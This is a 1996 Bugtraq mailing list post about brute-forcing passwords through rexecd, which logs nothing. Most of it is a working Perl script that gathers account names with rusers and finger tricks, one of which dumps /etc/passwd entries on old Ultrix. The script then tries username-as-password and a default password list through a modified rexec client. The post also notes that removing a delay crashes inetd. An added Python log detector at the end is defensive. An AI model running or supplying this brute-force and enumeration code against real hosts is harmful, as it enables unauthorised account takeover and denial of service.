Bugtraq mailing list archives

rexec brute


From: mudge () l0pht com (bastard)
Date: Tue, 4 Jun 1996 15:32:34 -0400


-- *Hobbit* wrote --
Pop3 isn't the only thing with that problem.  Stock rexec, for example, never
logs anything and is another good way to hammer on password guesses from the
outside.  [See "rservice.c" to make this easier...]  Several other daemons,
particularly the vendor-supplied variety, are similarly lame.  That's
what tcp wrappers and logdaemon are for..

_H*
-- End *Hobbit* --

Since *Hobbit* broached the topic...

shell, login, telnet, pop, imap, ftp, telnet, and just about anything
else that takes a username / password pair is susceptible to vanilla
brute force attacks.

Of course exec (rexecd) does probably the worst job of logging from the
bunch (none). So it's one of the favorites.

Here's one of the old files I had floating around that I did a couple years
back.

All you need to do to rexec.c is modify it to take the password on the
command line and away you go. This program is easily modified to handle
dictionaries, bang on other services like pop, login, etc.

I'd post the simple mod to rexec.c but if you can't figure it out then
you *really* should get out of the pool.

You might need to tweak the select() call to allow more time if you
find you are hosing inetds. Or... comment the call out and you will
crash the inetd of the host you are scanning.

.mudge () l0pht com

PS Better yet... use netcat to do this as it's much cleaner.

-----begin rexec.pl------
#!/bin/perl
# I dislike perl so shut-up if it ain't nice and tight!
# this is the wrapper for the modified rexec program. The rexec
# program allows the password to be supplied on the command line for
# easier automation. This perl script gathers information from rusers
# and finger and attempts to hack these with information gathered and
# with standard defaults.
# mudge 12/94

$COMMAND = "echo SECURITY";
$PROGRAM = "./rexec";
$TARGET = $ARGV[0];
$i = 0;

die "Usage: $0 target\n" if @ARGV != 1;

@SCRATCH = ('daemon', 'uucp', 'bin', 'adm', 'sysadmin', 'nuucp', 'sync',
             'user', 'guest', 'demo', 'test', 'public', 'help', 'field',
             'system', 'operator', 'sys', 'tty', 'unix', 'who', 'learn',
             'uuhost', '4DGifts', 'lp', 'tour', 'tutor');
@PASS = ('secret', 'love', 'sex', 'money', 'god', 'letmein', 'fred');


open (RUSERS, "rusers -l $TARGET | ");

# get information from rusers about the people logged in
while (<RUSERS>) {
   ($echo) = split;
   push(@SCRATCH, $echo);
}

close (RUSERS);

open (FINGER, "finger \@$TARGET | ");

   # get information from finger about people logged in
   while (<FINGER>) {
      ($local) = split;
      push(@SCRATCH, $local) if !($local =~ /ogin/) && !($local =~ /^\[/) &&
                                !($local =~ /^$/);
   }

   close (FINGER);

   open (FINGER, "finger \@\@$TARGET | ");
   # this works on older Ultrix systems... it'll show you all the entries
   # in /etc/passwd
   while (<FINGER>) {
      ($local) = split;
      push(@SCRATCH, $local) if !($local =~ /ogin/) && !($local =~ /^\[/) &&
                                !($local =~ /^$/);
   }

   close (FINGER);

   open (FINGER, "finger 9876543219876543219876543212345\@$TARGET | ");
   # this shows a couple of extra accounts on some sun machines
   while (<FINGER>) {
      ($local) = split;
      push(@SCRATCH, $local) if !($local =~ /ogin/) && !($local =~ /^\[/) &&
                                !($local =~ /^$/);
   }

   close (FINGER);

# ugly section where we take the array made from rusers and get rid
# of multiple logins by the same person. xterm's etc...

   @INORDER = sort @SCRATCH;
   while (@INORDER) {
      $local = shift(@INORDER);
      if ($i == 0) {
         push(@USER, $local);
         $last = $local;
         $i = $i + 1;
      }
      else {
         if (!($local eq $last)) {
            push(@USER, $local);
         }
      }
      $last = $local;
   }

#   print "------------------\n";
#   grep((print "$_\n"), @USER);

   # try the users login name as their password
   foreach $u (0 .. $#USER) {
      print "Trying $USER[$u].......\n";
      alarm 0;
      alarm 10;
      open (FOO, "$PROGRAM -l $USER[$u] -p $USER[$u] $TARGET $COMMAND | ");
      while (<FOO>) {
         if (/SECURITY/) {
            print "\nWARNING Hacked $USER[$u] $USER[$u]\n";
         }
      }

      close (FOO);

         # if you don't take a short break, inetd will kill the service
         # as it thinks it's looping... easy enough denial of service
         # attack.

      select(undef, undef, undef, 1.5);

   }

   foreach $u (0 .. $#USER) {
      print "Trying $USER[$u].......\n";
      foreach $p (0 .. $#PASS) {
         alarm 0;
         alarm 10;
         open (FOO, "$PROGRAM -l $USER[$u] -p $PASS[$p] $TARGET $COMMAND | ");
         while (<FOO>) {
           if (/SECURITY/) {
              print "\nWARNING Hacked $USER[$u] $PASS[$p]\n\n";
           }
         }

         close (FOO);

         # try to prevent the service from shutting down... as a failsafe,
         # the alarm's will kick us out.
         select(undef, undef, undef, 1.5);

      }
   }
   alarm 0;
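
Both posts above make the same defensive point: stock rexecd logs nothing, so the only per-attempt record an administrator gets is what tcp wrappers (tcpd) writes when it accepts the connection on the daemon's behalf. The script below is an added example, not part of mudge's post or of tcp wrappers or logdaemon, showing how to turn that single signal into a brute-force detection. It parses constructed syslog lines in the style tcpd emits ("connect from <source>" logged under the wrapped daemon's name; host names and addresses are made up), keeps a sliding window of connections per source, and flags any source that reaches a threshold of exec-service connections inside the window. The threshold and window sizes are assumptions to be tuned per site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample syslog lines in the style tcpd writes when it wraps
# rexecd.  The daemon itself logs nothing, so the wrapper's "connect from"
# line is the only per-attempt signal.  Host name and addresses are made up.
SAMPLE_LOG = """\
Jun  4 15:32:01 gw rexecd[2201]: connect from 192.0.2.5
Jun  4 15:32:03 gw rexecd[2204]: connect from 192.0.2.5
Jun  4 15:32:04 gw rexecd[2207]: connect from 192.0.2.5
Jun  4 15:32:06 gw rexecd[2210]: connect from 192.0.2.5
Jun  4 15:32:07 gw rexecd[2213]: connect from 192.0.2.5
Jun  4 15:32:09 gw in.ftpd[2215]: connect from 198.51.100.7
Jun  4 15:40:00 gw rexecd[2300]: connect from 203.0.113.9
Jun  4 15:41:00 gw rexecd[2305]: connect from 203.0.113.9
"""

# syslog timestamp, host, "<daemon>[pid]: connect from <src>"
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ "
    r"(?P<daemon>[\w.]+)\[\d+\]: connect from (?P<src>\S+)$"
)


def parse_line(line, year=1996):
    """Return (timestamp, daemon, source) for a tcpd 'connect from' line,
    or None for anything else.  syslog omits the year, so it is supplied."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["daemon"], m["src"]


def find_bursts(lines, daemon="rexecd", threshold=5, window_seconds=30):
    """Sliding-window detector: for each source, keep the timestamps of its
    connections to `daemon` that fall inside the last `window_seconds`.
    Returns {source: (count, first_ts, last_ts)} for every source that
    reached `threshold` connections inside one window (first hit only)."""
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # not a wrapper connect line; ignore
        ts, d, src = parsed
        if d != daemon:
            continue  # other wrapped services are out of scope here
        q = recent[src]
        q.append(ts)
        # drop timestamps that have aged out of the window
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold and src not in alerts:
            alerts[src] = (len(q), q[0], ts)
    return alerts


if __name__ == "__main__":
    for src, (n, first, last) in find_bursts(SAMPLE_LOG.splitlines()).items():
        print(f"ALERT {src}: {n} {'rexecd'} connections "
              f"between {first:%H:%M:%S} and {last:%H:%M:%S}")
```

Run against the sample, only 192.0.2.5 is reported (five connections in six seconds); 203.0.113.9 makes two connections a minute apart and stays under the threshold, and the ftpd line is skipped because the detector is scoped to one daemon. A reported source is a candidate for a hosts.deny entry or a closer look; the same loop works unchanged on any other tcpd-wrapped service by changing the `daemon` argument.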


